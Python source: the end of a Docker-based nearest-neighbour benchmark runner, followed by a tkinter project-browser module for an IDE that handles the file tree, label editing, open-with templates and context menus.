query_args = [json.loads(q) for q in args.queries]
if args.power_capture:
power_capture( args.power_capture )
power_capture.ping()
definition = Definition(
algorithm=args.algorithm,
docker_tag=None, # not needed
module=args.module,
constructor=args.constructor,
arguments=algo_args,
query_argument_groups=query_args,
disabled=False
)
run(definition, args.dataset, args.count, args.runs, args.rebuild,
args.upload_index, args.download_index, args.blob_prefix, args.sas_string)
def run_docker(definition, dataset, count, runs, timeout, rebuild,
cpu_limit, mem_limit=None, t3=None, power_capture=None,
upload_index=False, download_index=False,
blob_prefix="", sas_string=""):
cmd = ['--dataset', dataset,
'--algorithm', definition.algorithm,
'--module', definition.module,
'--constructor', definition.constructor,
'--runs', str(runs),
'--count', str(count)]
if power_capture:
cmd += ["--power-capture", power_capture ]
if rebuild:
cmd.append("--rebuild")
if upload_index:
cmd.append("--upload-index")
cmd += ["--blob-prefix", blob_prefix]
cmd += ["--sas-string", sas_string]
if download_index:
cmd.append("--download-index")
cmd += ["--blob-prefix", blob_prefix]
cmd += ["--sas-string", sas_string]
cmd.append(json.dumps(definition.arguments))
cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
client = docker.from_env()
if mem_limit is None:
mem_limit = psutil.virtual_memory().available
container = None
if t3:
container = t3_create_container(definition, cmd, cpu_limit, mem_limit )
timeout = 3600*24*3 # 3 days
print("Setting container wait timeout to 3 days")
else:
container = client.containers.run(
definition.docker_tag,
cmd,
volumes={
os.path.abspath('benchmark'):
{'bind': '/home/app/benchmark', 'mode': 'ro'},
os.path.abspath('data'):
{'bind': '/home/app/data', 'mode': 'rw'},
os.path.abspath('results'):
{'bind': '/home/app/results', 'mode': 'rw'},
},
cpuset_cpus=cpu_limit,
mem_limit=mem_limit,
detach=True)
logger = logging.getLogger(f"annb.{container.short_id}")
logger.info('Created container %s: CPU limit %s, mem limit %s, timeout %d, command %s' % \
(container.short_id, cpu_limit, mem_limit, timeout, cmd))
def stream_logs():
for line in container.logs(stream=True):
logger.info(colors.color(line.decode().rstrip(), fg='blue'))
t = threading.Thread(target=stream_logs, daemon=True)
t.start()
try:
exit_code = container.wait(timeout=timeout)
# Exit if exit code
if exit_code not in [0, None]:
logger.error(colors.color(container.logs().decode(), fg='red'))
logger.error('Child process for container %s raised exception %d' % (container.short_id, exit_code))
except:
logger.error('Container.wait for container %s failed with exception' % container.short_id)
logger.error('Invoked with %s' % cmd)
traceback.print_exc()
finally:
container.remove(force=True)
def run_no_docker(definition, dataset, count, runs, timeout, rebuild,
cpu_limit, mem_limit=None, t3=False, power_capture=None,
upload_index=False, download_index=False,
blob_prefix="", sas_string=""):
cmd = ['--dataset', dataset,
'--algorithm', definition.algorithm,
'--module', definition.module,
'--constructor', definition.constructor,
'--runs', str(runs),
'--count', str(count)]
if power_capture:
cmd += ["--power-capture", power_capture ]
if rebuild:
cmd.append("--rebuild")
if upload_index:
cmd.append("--upload-index")
cmd += ["--blob-prefix", blob_prefix]
cmd += ["--sas-string", sas_string]
if download_index:
cmd.append("--download-index")
cmd += ["--blob-prefix", blob_prefix]
cmd += ["--sas-string", sas_string]
cmd.append(json.dumps(definition.arguments))
cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
run_from_cmdline(cmd)
|
basebrowser.py | # -*- coding: utf-8 -*-
from noval import GetApp,_,core,constants
import os
import tkinter as tk
from tkinter import messagebox,filedialog
import noval.consts as consts
from tkinter import ttk
import noval.util.utils as utils
import noval.util.fileutils as fileutils
import noval.util.strutils as strutils
import noval.project.baseviewer as baseviewer
import noval.imageutils as imageutils
import noval.menu as tkmenu
import noval.misc as misc
import threading
from noval.project.command import ProjectAddProgressFilesCommand
from noval.python.parser.utils import py_cmp,py_sorted
import noval.terminal as terminal
import noval.project.property as projectproperty
import time
import noval.project.document as projectdocument
import noval.ui_utils as ui_utils
import noval.syntax.syntax as syntax
import noval.project.command as projectcommand
import noval.project.openwith as openwith
class EntryPopup(tk.Entry):
def __init__(self, parent, text, item,**kw):
''' If relwidth is set, then width is ignored '''
tk.Entry.__init__(self,parent, **kw)
self.item = item
self.insert(0, text)
self['readonlybackground'] = 'white'
self['selectbackground'] = '#1BA1E2'
self['exportselection'] = False
self.focus_force()
self.bind("<Control-a>", self.selectAll)
self.bind("<Escape>", lambda *ignore: self.destroy())
self.bind("<Return>",self.master.FinishLabel)
self.selectAll()
def selectAll(self, *ignore):
''' Set selection on the whole text '''
self.selection_range(0, 'end')
# returns 'break' to interrupt default key-bindings
return 'break'
class ProjectTreeCtrl(ttk.Treeview):
#用来设置粗体节点,粗体节点用来表示项目启动文件
BOLD_TAG = 'BoldItem'
NORMAL_TAG = 'NormalItem'
#----------------------------------------------------------------------------
# Overridden Methods
#----------------------------------------------------------------------------
def __init__(self, master, **kw):
ttk.Treeview.__init__(self, master, **kw)
self._iconLookup = {}
self._blankIconImage = imageutils.getBlankIcon()
self._packageFolderImage = imageutils.getPackageFolderIcon()
self._folderClosedImage = imageutils.getFolderClosedIcon()
self.is_edit_state = False
self.entryPopup = None
self.bind("<Escape>", self.EndLabel)
self.bind("<Button-1>", self.FinishLabel)
def SelectItem(self,node):
self.selection_set(node)
self.focus(node)
def BuildLookupIcon(self):
if 0 == len(self._iconLookup):
self.RebuildLookupIcon()
def RebuildLookupIcon(self):
templates = GetApp().GetDocumentManager().GetTemplates()
for template in templates:
icon = template.GetIcon()
self._iconLookup[template] = icon
#设置项目启动文件节点为粗体
def SetItemBold(self,node,bold=True):
if bold:
self.item(node, tags=(self.BOLD_TAG))
self.tag_configure(self.BOLD_TAG, font=consts.TREE_VIEW_BOLD_FONT)
else:
self.item(node, tags=(self.NORMAL_TAG))
self.tag_configure(self.NORMAL_TAG, font=consts.TREE_VIEW_FONT)
def GetPyData(self,node):
if node is None:
return None
values = self.item(node)["values"]
if type(values) == str:
return None
return values[0]
def SortChildren(self,node):
# update tree
children = self.get_children(node)
ids_sorted_by_name = py_sorted(children, cmp_func=self.OnCompareItems)
self.set_children(node, *ids_sorted_by_name)
def GetChildrenCount(self,item):
return len(self.get_children(item))
def DeleteChildren(self,node):
for child_id in self.get_children(node):
self.delete(child_id)
def GetRootItem(self):
return self.GetFirstChild(None)
def GetFirstChild(self,item):
childs = self.get_children(item)
if 0 == len(childs):
return None
return childs[0]
def EndLabel(self,event):
if not self.is_edit_state or self.entryPopup is None:
return
self.entryPopup.destroy()
self.entryPopup = None
self.is_edit_state = False
def FinishLabel(self,event):
if not self.is_edit_state or self.entryPopup is None:
return
self.master.GetView().OnEndLabelEdit(self.entryPopup.item,self.entryPopup.get())
self.EndLabel(event)
def EditLabel(self,item):
self.is_edit_state = True
item_box = self.bbox(item)
if not item_box:
self.see(item)
return
x,y,width,height = item_box
# y-axis offset
pady = height // 2
# place Entry popup properly
text = self.item(item, 'text')
self.entryPopup = EntryPopup(self,text,item)
self.entryPopup.place( x=30, y=y+pady, anchor=tk.W, relwidth=1)
def OnCompareItems(self, item1, item2):
item1IsFolder = (self.GetPyData(item1) == None)
item2IsFolder = (self.GetPyData(item2) == None)
if (item1IsFolder == item2IsFolder): # if both are folders or both not
return py_cmp(self.item(item1,"text").lower(), self.item(item2,"text").lower())
elif item1IsFolder and not item2IsFolder: # folders sort above non-folders
return -1
elif not item1IsFolder and item2IsFolder: # folders sort above non-folders
return 1
def AppendFolder(self, parent, folderName):
item = self.insert(parent, "end", text=folderName, image=self._folderClosedImage)
return item
def GetIconFromName(self,filename):
template = wx.GetApp().GetDocumentManager().FindTemplateForPath(filename)
return self.GetTemplateIcon(template)
def GetProjectIcon(self):
template = GetApp().GetDocumentManager().FindTemplateForTestPath(consts.PROJECT_EXTENSION)
project_file_image = self.GetTemplateIcon(template)
return project_file_image
def GetTemplateIcon(self,template):
self.BuildLookupIcon()
if template in self._iconLookup:
return self._iconLookup[template]
return self._blankIconImage
def AppendItem(self, parent, filename, file):
#如果是虚拟文件,则不创建树节点
if filename == consts.DUMMY_NODE_TEXT:
return None
#查找项目文件是否有另外的打开方式模板
template = GetApp().MainFrame.GetView(consts.PROJECT_VIEW_NAME).GetView().GetOpenDocumentTemplate(file)
found = False
#如果没有则使用项目文件扩展名对应的默认模板
if template is None:
template = GetApp().GetDocumentManager().FindTemplateForPath(filename)
file_image = self.GetTemplateIcon(template)
#valus参数必须用tuple类型,不能用str类型,否则会数据存储错误
item = self.insert(parent, "end", text=filename, image=file_image,values=(file.filePath,))
return item
def AddFolder(self, folderPath):
folderItems = []
if folderPath != None:
folderTree = folderPath.split('/')
item = self.GetRootItem()
for folderName in folderTree:
found = False
for child in self.get_children(item):
file = self.GetPyData(child)
if file:
pass
else: # folder
if self.item(child, "text") == folderName:
item = child
found = True
break
if not found:
item = self.AppendFolder(item, folderName)
folderItems.append(item)
return folderItems
def FindItem(self, filePath, parentItem=None):
if not parentItem:
parentItem = self.GetRootItem()
for child in self.get_children(parentItem):
child_file_path = self.GetPyData(child)
if child_file_path:
if child_file_path == filePath:
return child
else: # folder
result = self.FindItem(filePath, child) # do recursive call
if result:
return result
return None
def FindFolder(self, folderPath):
if folderPath != None:
folderTree = folderPath.split('/')
item = self.GetRootItem()
for folderName in folderTree:
found = False
for child in self.get_children(item):
file = self.GetPyData(child)
if file:
pass
else: # folder
if self.item(child, "text") == folderName:
item = child
found = True
break
if found:
return item
return None
def FindClosestFolder(self, x, y):
item, flags = self.HitTest((x,y))
if item:
file = self.GetPyData(item)
if file:
item = self.GetItemParent(item)
return item
return item
return None
def GetSingleSelectItem(self):
items = self.selection()
if not items:
return None
return items[0]
class BaseProjectbrowser(ttk.Frame):
def __init__(
self,
master,
columns=["#0", "kind", "path"],
displaycolumns="#all",
show_scrollbar=True,
borderwidth=0,
relief="flat",
**tree_kw
):
ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
#文档和项目的对照表
self._mapToProject = dict()
#绑定ShowView事件,在事件中加载保存的历史项目列表
GetApp().bind("ShowView", self.Show, True)
# http://wiki.tcl.tk/44444#pagetoc50f90d9a
self.vert_scrollbar = ttk.Scrollbar(
self, orient=tk.VERTICAL, style=None
)
if show_scrollbar:
self.vert_scrollbar.grid(row=1, column=1, sticky=tk.NSEW)
self.project_combox = ttk.Combobox(self)
self.project_combox.bind("<<ComboboxSelected>>",self.ProjectSelect)
self.project_combox.grid(row=0, column=0, sticky=tk.NSEW)
#设置combox只读不能编辑
self.project_combox.state(['readonly'])
self.tree = self.GetProjectTreectrl(**tree_kw)
#控件默认会显示头部,此处用以屏蔽头部的显示
self.tree.column("#0", anchor=tk.W, stretch=True)
self.tree["show"] = ("tree",)
self.tree.grid(row=1, column=0, sticky=tk.NSEW)
self.vert_scrollbar["command"] = self.tree.yview
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
#鼠标双击Tree控件事件
self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
self.tree.bind("<Return>",self.OnEnter)
#展开节点时记住并保存子节点展开状态
self.tree.bind("<<TreeviewOpen>>", self.OpenTreeItem)
#软件启动时加载存储配置保存的历史项目列表,记住这个状态
self._is_loading = False
#创建项目视图,所有项目共享同一个视图,必须在函数的最后创建
view = self.CreateView()
self.SetView(view)
self.GetView().AddProjectRoot(_("Projects"))
GetApp().bind("InitTkDnd",self.SetDropTarget,True)
self.tree.bind("<3>", self.on_secondary_click, True)
self.tree.bind("<<TreeviewSelect>>", self._on_select, True)
#加载默认过滤项目文件扩展名列表,刷新项目文件夹时使用
self.filters = utils.profile_get("DEFAULT_FILE_FILTERS",syntax.SyntaxThemeManager().GetLexer(GetApp().GetDefaultLangId()).Exts)
def SetDropTarget(self,event):
#项目视图允许拖拽添加文件
if GetApp().dnd is not None and utils.profile_get_int('ALLOW_DROP_OPENFILE',True):
GetApp().dnd.bindtarget(self, baseviewer.ProjectFileDropTarget(self.GetView()), 'text/uri-list')
def GetProjectTreectrl(self,**tree_kw):
return ProjectTreeCtrl(self,
yscrollcommand=self.vert_scrollbar.set,**tree_kw)
def _on_select(self,event):
#选中项目节点时设置项目视图为活跃视图
GetApp().GetDocumentManager().ActivateView(self.GetView())
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def GetItemFile(self, item):
file_path = self.GetView()._GetItemFilePath(item)
if not file_path:
return None
return self.GetView().GetDocument().GetModel().FindFile(file_path)
def OnEnter(self,event):
if self.tree.is_edit_state:
self.tree.FinishLabel(event)
return
self.OpenSelection()
def on_double_click(self, event):
self.OpenSelection()
def OpenSelection(self):
selections = self.tree.selection()
if not selections:
return
doc = None
try:
item = selections[0]
filepath = self.GetView()._GetItemFilePath(item)
#项目文件的打开方式模板
file_template = None
if filepath:
#标准化文件路径
filepath = fileutils.opj(filepath)
if not os.path.exists(filepath):
msgTitle = GetApp().GetAppName()
if not msgTitle:
msgTitle = _("File Not Found")
ret = messagebox.askyesno(msgTitle,_("The file '%s' was not found in '%s'.\n\nWould you like to browse for the file?") \
% (fileutils.get_filename_from_path(filepath), fileutils.get_filepath_from_path(filepath)),parent=self)
#选中否
if not ret:
return
newpath = filedialog.askopenfilename(
master=self,
### filetypes=descrs,
initialdir=os.getcwd(),
title = _("Choose a file"),
initialfile = fileutils.get_filename_from_path(filepath)
)
if newpath:
# update Project Model with new location
self.GetView().GetDocument().UpdateFilePath(filepath, newpath)
filepath = newpath
else:
#选择取消按钮
return
else:
project_file = self.GetItemFile(item)
#获取项目文件的打开方式模板
file_template = self.GetView().GetOpenDocumentTemplate(project_file)
#如果存在项目文件的打开方式模板,则以打开方式模板打开项目文件
if file_template:
doc = GetApp().GetDocumentManager().CreateTemplateDocument(file_template,filepath, core.DOC_SILENT|core.DOC_OPEN_ONCE)
docs = [doc]
#否则以扩展名默认模板打开项目文件
else:
docs = GetApp().GetDocumentManager().CreateDocument(filepath, core.DOC_SILENT|core.DOC_OPEN_ONCE)
if not docs and filepath.endswith(consts.PROJECT_EXTENSION): # project already open
self.SetProject(filepath)
elif docs:
baseviewer.AddProjectMapping(docs[0])
#检查文件扩展名是否有对应的文件扩展插件
ui_utils.CheckFileExtension(filepath,False)
except IOError as e:
msgTitle = wx.GetApp().GetAppName()
if not msgTitle:
msgTitle = _("File Error")
wx.MessageBox("Could not open '%s'." % wx.lib.docview.FileNameFromPath(filepath),
msgTitle,
wx.OK | wx.ICON_EXCLAMATION,
self.GetFrame())
def OpenSelectionWith(self):
'''
用户选择打开方式来打开项目文件
'''
item = self.tree.selection()[0]
item_file = self.GetItemFile(item)
selected_file_path = item_file.filePath
dlg = openwith.EditorSelectionDlg(GetApp().GetTopWindow(),item_file,self.GetView().GetDocument())
if dlg.ShowModal() == constants.ID_OK:
found_doc = GetApp().GetDocumentManager().GetDocument(selected_file_path)
if found_doc:
ret = messagebox.askyesno(GetApp().GetAppName(),_("The document \"%s\" is already open,Do you want to close it?") %selected_file_path)
if ret == True:
found_view = found_doc.GetFirstView()
found_view.Close()
if found_doc in GetApp().GetDocumentManager().GetDocuments():
found_doc.Destroy()
frame = found_view.GetFrame()
if frame:
frame.Destroy()
else:
return
doc = GetApp().GetDocumentManager().CreateTemplateDocument(dlg.selected_template,selected_file_path, core.DOC_SILENT)
#用户更改了打开方式
if doc is not None and dlg._is_changed and GetApp().GetDocumentManager().GetDocument(selected_file_path):
#打开方式的模板图标
template_icon = dlg.selected_template.GetIcon()
if dlg.Openwith == dlg.OPEN_WITH_PATH:
utils.profile_set(self.GetView().GetDocument().GetFileKey(item_file,"Open"),dlg.selected_template.GetDocumentName())
file_template = GetApp().GetDocumentManager().FindTemplateForPath(selected_file_path)
if file_template != dlg.selected_template:
if template_icon is not None:
#更改文件item的模板图标
self.GetView()._treeCtrl.item(item,image=template_icon)
#以所有文件名方式打开
elif dlg.Openwith == dlg.OPEN_WITH_NAME:
filename = os.path.basename(selected_file_path)
#保存文件名对应的模板
utils.profile_set("Open/filenames/%s" % filename,dlg.selected_template.GetDocumentName())
if template_icon is not None:
#批量更改所有文件名的图标
self.ChangeItemsImageWithFilename(self.GetView()._treeCtrl.GetRootItem(),filename,template_icon)
#以所有扩展名方式打开
elif dlg.Openwith == dlg.OPEN_WITH_EXTENSION:
extension = strutils.get_file_extension(os.path.basename(selected_file_path))
#保存扩展名对应的模板
utils.profile_set("Open/extensions/%s" % extension,dlg.selected_template.GetDocumentName())
if template_icon is not None:
#批量更改所有扩展名的图标
self.ChangeItemsImageWithExtension(self.GetView()._treeCtrl.GetRootItem(),extension,template_icon)
else:
assert(False)
def ChangeItemsImageWithFilename(self,parent_item,filename,template_icon):
'''
所有项目文件的文件名匹配的均批量修改图标
'''
if parent_item is None:
return
tree_ctrl = self.GetView()._treeCtrl
childs = tree_ctrl.get_children(parent_item)
for child_item in childs:
if self.GetView()._IsItemFile(child_item):
file_name = tree_ctrl.item(child_item,"text")
#匹配文件名
if file_name == filename:
tree_ctrl.item(child_item,image=template_icon)
#递归更改图标
self.ChangeItemsImageWithFilename(child_item,filename,template_icon)
def ChangeItemsImageWithExtension(self,parent_item,extension,template_icon):
'''
所有项目文件的扩展名匹配的均批量修改图标
'''
if parent_item is None:
return
tree_ctrl = self.GetView()._treeCtrl
childs = tree_ctrl.get_children(parent_item)
for child_item in childs:
if self.GetView()._IsItemFile(child_item):
file_name = tree_ctrl.item(child_item,"text")
#匹配扩展名
if strutils.get_file_extension(file_name) == extension:
tree_ctrl.item(child_item,image=template_icon)
#递归更改图标
self.ChangeItemsImageWithExtension(child_item,extension,template_icon)
def GetView(self):
return self._view
def CreateView(self):
return baseviewer.ProjectView(self)
def SetView(self,view):
self._view = view
def AddProject(self,name):
if type(self.project_combox['values']) == str:
self.project_combox['values'] = [name]
return 0
else:
self.project_combox['values'] = self.project_combox['values'] + (name,)
return len(self.project_combox['values']) - 1
def LoadSavedProjects(self):
self._is_loading = True
openedDocs = False
if utils.profile_get_int(consts.PROJECT_DOCS_SAVED_KEY, True):
docList = utils.profile_get(consts.PROJECT_SAVE_DOCS_KEY,[])
doc = None
for fileName in docList:
if isinstance(fileName, str) and \
strutils.get_file_extension(fileName) == consts.PROJECT_SHORT_EXTENSION:
if utils.is_py2():
fileName = fileName.decode("utf-8")
if os.path.exists(fileName):
doc = GetApp().GetDocumentManager().CreateDocument(fileName, core.DOC_SILENT|core.DOC_OPEN_ONCE)
if doc:
openedDocs = True
self._is_loading = False
return openedDocs
def SetCurrentProject(self):
#如果是命令行打开项目,则设置该项目为当前项目
open_project_path = GetApp().OpenProjectPath
if open_project_path is not None:
self.GetView().SetProject(open_project_path)
#否则从存储配置中加载当前项目
else:
currProject = utils.profile_get(consts.CURRENT_PROJECT_KEY)
docList = [document.GetFilename() for document in self.GetView().Documents]
#从所有存储项目中查找是否存在当前项目,如果存在则加载为活跃项目
if currProject in docList:
self.GetView().SetProject(currProject)
@property
def IsLoading(self):
return self._is_loading
def SetFocus(self):
self.focus_set()
self.tree.focus_set()
def ProjectSelect(self,event):
self.GetView().ProjectSelect()
def Show(self,event):
if event.get('view_name') != consts.PROJECT_VIEW_NAME:
utils.get_logger().info("project view could not handler view %s showview event",event.get('view_name'))
return
project = self.GetView().GetDocument()
#加载存储项目
if not project:
self.LoadSavedProjects()
def OpenTreeItem(self,event):
#项目列表为空时不处理事件
if self.GetView().GetDocument() == None:
return
self.GetView().SaveFolderState()
def FindProjectFromMapping(self, key):
""" 从对照表中快速查找文档对应的项目"""
return self._mapToProject.get(key,None)
def AddProjectMapping(self, key, projectDoc=None):
""" 设置文档或者其他对象对应的项目
"""
if not projectDoc:
projectDoc = self.GetCurrentProject()
self._mapToProject[key] = projectDoc
def RemoveProjectMapping(self, key):
""" Remove mapping from model or document to project. """
if key in self._mapToProject:
del self._mapToProject[key]
def GetCurrentProject(self):
view = self.GetView()
if view:
return view.GetDocument()
return None
def FindProjectByFile(self, filename):
'''查找包含文件的所有项目文档,当前项目文档放在第一位'''
retval = []
for document in GetApp().GetDocumentManager().GetDocuments():
#文档类型为项目文档
if document.GetDocumentTemplate().GetDocumentType() == projectdocument.ProjectDocument:
if document.GetFilename() == filename:
retval.append(document)
#项目文档是否包含该文件
elif document.IsFileInProject(filename):
retval.append(document)
#将当前项目置于第一位
currProject = self.GetCurrentProject()
if currProject and currProject in retval:
retval.remove(currProject)
retval.insert(0, currProject)
return retval
def _InitCommands(self):
GetApp().AddCommand(constants.ID_NEW_PROJECT,_("&Project"),_("New Project"),self.NewProject,image="project/new.png")
GetApp().AddCommand(constants.ID_OPEN_PROJECT,_("&Project"),_("Open Project"),self.OpenProject,image="project/open.png")
GetApp().AddCommand(constants.ID_CLOSE_PROJECT,_("&Project"),_("Close Project"),self.CloseProject,tester=lambda:self.GetView().UpdateUI(constants.ID_CLOSE_PROJECT))
GetApp().AddCommand(constants.ID_SAVE_PROJECT,_("&Project"),_("Save Project"),self.SaveProject,image="project/save.png",tester=lambda:self.GetView().UpdateUI(constants.ID_SAVE_PROJECT))
GetApp().AddCommand(constants.ID_DELETE_PROJECT,_("&Project"),_("Delete Project"),self.DeleteProject,image="project/trash.png",tester=lambda:self.GetView().UpdateUI(constants.ID_DELETE_PROJECT))
GetApp().AddCommand(constants.ID_CLEAN_PROJECT,_("&Project"),_("Clean Project"),self.CleanProject,tester=lambda:self.GetView().UpdateUI(constants.ID_CLEAN_PROJECT))
GetApp().AddCommand(constants.ID_ARCHIVE_PROJECT,_("&Project"),_("Archive Project"),self.ArchiveProject,image="project/archive.png",add_separator=True,tester=lambda:self.GetView().UpdateUI(constants.ID_ARCHIVE_PROJECT))
GetApp().AddCommand(constants.ID_IMPORT_FILES,_("&Project"),_("Import Files..."),image=GetApp().GetImage("project/import.png"),tester=lambda:self.GetView().UpdateUI(constants.ID_IMPORT_FILES),handler=lambda:self.ProcessEvent(constants.ID_IMPORT_FILES))
GetApp().AddCommand(constants.ID_ADD_FILES_TO_PROJECT,_("&Project"),_("Add &Files to Project..."),handler=lambda:self.ProcessEvent(constants.ID_ADD_FILES_TO_PROJECT),tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_FILES_TO_PROJECT))
GetApp().AddCommand(constants.ID_ADD_DIR_FILES_TO_PROJECT,_("&Project"),_("Add Directory Files to Project..."),handler=lambda:self.ProcessEvent(constants.ID_ADD_DIR_FILES_TO_PROJECT),tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_DIR_FILES_TO_PROJECT))
GetApp().AddCommand(constants.ID_ADD_CURRENT_FILE_TO_PROJECT,_("&Project"),_("&Add Active File to Project..."),handler=lambda:self.ProcessEvent(constants.ID_ADD_CURRENT_FILE_TO_PROJECT),add_separator=True,tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_CURRENT_FILE_TO_PROJECT))
GetApp().AddCommand(constants.ID_ADD_NEW_FILE,_("&Project"),_("New File"),image=GetApp().GetImage("project/new_file.png"),handler=lambda:self.ProcessEvent(constants.ID_ADD_NEW_FILE),tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_NEW_FILE))
GetApp().AddCommand(constants.ID_ADD_FOLDER,_("&Project"),_("New Folder"),image=GetApp().GetImage("project/folder.png"),handler=lambda:self.ProcessEvent(constants.ID_ADD_FOLDER),add_separator=True,tester=lambda:self.GetView().UpdateUI(constants.ID_ADD_FOLDER))
GetApp().AddCommand(constants.ID_PROPERTIES,_("&Project"),_("Project Properties"),self.OnProjectProperties,image=GetApp().GetImage("project/properties.png"),tester=lambda:self.GetView().UpdateUI(constants.ID_PROPERTIES))
GetApp().AddCommand(constants.ID_OPEN_FOLDER_PATH,_("&Project"),_("Open Project Path in Explorer"),handler=self.OpenProjectPath,tester=lambda:self.GetView().UpdateUI(constants.ID_OPEN_FOLDER_PATH))
@utils.call_after_with_arg(1)
def NewProject(self):
'''
新建项目
'''
template = GetApp().GetDocumentManager().FindTemplateForTestPath(consts.PROJECT_EXTENSION)
template.CreateDocument("", flags = core.DOC_NEW)
@utils.call_after_with_arg(1)
def OpenProject(self):
'''
打开项目
'''
template = GetApp().GetDocumentManager().FindTemplateForTestPath(consts.PROJECT_EXTENSION)
#注意这里最好不要设置initialdir,会自动选择上一次打开的目录
descrs = [strutils.get_template_filter(template),]
project_path = filedialog.askopenfilename(
master=GetApp(),
filetypes=descrs
)
if not project_path:
return
project_path = fileutils.opj(project_path)
self.GetView().OpenProject(project_path)
@misc.update_toolbar
def CloseProject(self):
self.GetView().CloseProject()
@misc.update_toolbar
def SaveProject(self):
self.GetView().SaveProject()
@misc.update_toolbar
def DeleteProject(self):
self.GetView().DeleteProject()
def ArchiveProject(self):
self.GetView().ArchiveProject()
def CleanProject(self):
self.GetView().CleanProject()
def GetFilesFromCurrentProject(self):
view = self.GetView()
if view:
project = view.GetDocument()
if project:
return project.GetFiles()
return None
def on_secondary_click(self, event):
items = self.tree.selection()
if not items:
return
if self.GetView()._HasFilesSelected():
menu = self.GetPopupFileMenu(items[0])
else:
if not self.tree.parent(items[0]):
menu = self.GetPopupProjectMenu(items[0])
else:
menu = self.GetPopupFolderMenu(items[0])
menu["postcommand"] = lambda: menu._update_menu()
menu.tk_popup(event.x_root, event.y_root)
def GetPopupFileMenu(self,item):
menu = tkmenu.PopupMenu(self,**misc.get_style_configuration("Menu"))
menu.Append(constants.ID_OPEN_SELECTION, _("&Open"),handler=lambda:self.ProcessEvent(constants.ID_OPEN_SELECTION))
menu.Append(constants.ID_OPEN_SELECTION_WITH, _("&Open With..."), handler=lambda:self.ProcessEvent(constants.ID_OPEN_SELECTION_WITH))
common_item_ids = [None,consts.ID_UNDO,consts.ID_REDO,consts.ID_CUT,consts.ID_COPY,consts.ID_PASTE,consts.ID_CLEAR,None,consts.ID_SELECTALL]
self.GetCommonItemsMenu(menu,common_item_ids)
menu.Append(constants.ID_RENAME,_("&Rename"),handler=lambda:self.ProcessEvent(constants.ID_RENAME))
menu.Append(constants.ID_REMOVE_FROM_PROJECT,_("Remove from Project"),handler=lambda:self.ProcessEvent(constants.ID_REMOVE_FROM_PROJECT))
GetApp().event_generate(constants.PROJECTVIEW_POPUP_FILE_MENU_EVT,menu=menu,item=item)
self.AppendFileFoderCommonMenu(menu)
return menu
def AppendFileFoderCommonMenu(self,menu):
menu.add_separator()
menu.Append(constants.ID_PROPERTIES,_("&Properties"),handler=lambda:self.ProcessEvent(constants.ID_PROPERTIES))
menu.Append(constants.ID_OPEN_FOLDER_PATH,_("Open Path in Explorer"),handler=lambda:self.ProcessEvent(constants.ID_OPEN_FOLDER_PATH))
menu.Append(constants.ID_OPEN_TERMINAL_PATH,_("Open Command Prompt here..."),handler=lambda:self.ProcessEvent(constants.ID_OPEN_TERMINAL_PATH))
menu.Append(constants.ID_COPY_PATH,_("Copy Full Path"),handler=lambda:self.ProcessEvent(constants.ID_COPY_PATH))
def GetPopupFolderMenu(self,item):
menu = tkmenu.PopupMenu(self,**misc.get_style_configuration("Menu"))
menu["postcommand"] = lambda: menu._update_menu()
common_item_ids = self.GetPopupFolderItemIds()
self.GetCommonItemsMenu(menu,common_item_ids,is_folder=True)
menu.Append(constants.ID_RENAME,_("&Rename"),handler=lambda:self.ProcessEvent(constants.ID_RENAME))
menu.Append(constants.ID_REMOVE_FROM_PROJECT,_("Remove from Project"),handler=lambda:self.ProcessEvent(constants.ID_REMOVE_FROM_PROJECT))
menu.InsertAfter(constants.ID_ADD_FOLDER,constants.ID_REFRESH_FOLDER,_("&Refresh folder"),handler=lambda:self.ProcessEvent(constants.ID_REFRESH_FOLDER),img=GetApp().GetImage("project/refresh.png"))
GetApp().event_generate(constants.PROJECTVIEW_POPUP_FOLDER_MENU_EVT,menu=menu,item=item)
self.AppendFileFoderCommonMenu(menu)
return menu
def GetPopupFolderItemIds(self):
folder_item_ids = [constants.ID_IMPORT_FILES,constants.ID_ADD_FILES_TO_PROJECT,constants.ID_ADD_DIR_FILES_TO_PROJECT,None,constants.ID_ADD_NEW_FILE,constants.ID_ADD_FOLDER,\
None,consts.ID_UNDO,consts.ID_REDO,consts.ID_CUT,consts.ID_COPY,consts.ID_PASTE,consts.ID_CLEAR,None,consts.ID_SELECTALL]
return folder_item_ids
def GetPopupProjectMenu(self,item):
menu = tkmenu.PopupMenu(self,**misc.get_style_configuration("Menu"))
menu["postcommand"] = lambda: menu._update_menu()
common_item_ids = self.GetPopupProjectItemIds()
self.GetCommonItemsMenu(menu,common_item_ids)
if self.GetCurrentProject() is not None:
menu.InsertAfter(constants.ID_ADD_FOLDER,constants.ID_REFRESH_FOLDER,_("&Refresh folder"),img=GetApp().GetImage("project/refresh.png"),handler=lambda:self.ProcessEvent(constants.ID_REFRESH_FOLDER))
menu.Append(constants.ID_RENAME,_("&Rename"),handler=lambda:self.ProcessEvent(constants.ID_RENAME))
menu.Append(constants.ID_OPEN_TERMINAL_PATH,_("Open Command Prompt here..."),handler=lambda:self.ProcessEvent(constants.ID_OPEN_TERMINAL_PATH))
menu.Append(constants.ID_COPY_PATH,_("Copy Full Path"),handler=lambda:self.ProcessEvent(constants.ID_COPY_PATH))
GetApp().event_generate(constants.PROJECTVIEW_POPUP_ROOT_MENU_EVT,menu=menu,item=item)
return menu
def GetPopupProjectItemIds(self):
project_item_ids = [constants.ID_NEW_PROJECT,constants.ID_OPEN_PROJECT]
if self.GetCurrentProject() is not None:
project_item_ids.extend([constants.ID_CLOSE_PROJECT,constants.ID_SAVE_PROJECT, constants.ID_DELETE_PROJECT,\
constants.ID_CLEAN_PROJECT,constants.ID_ARCHIVE_PROJECT])
project_item_ids.extend([None,constants.ID_IMPORT_FILES,constants.ID_ADD_FILES_TO_PROJECT, \
constants.ID_ADD_DIR_FILES_TO_PROJECT,None,constants.ID_ADD_NEW_FILE,constants.ID_ADD_FOLDER])
project_item_ids.extend([None, constants.ID_PROPERTIES,constants.ID_OPEN_FOLDER_PATH])
return project_item_ids
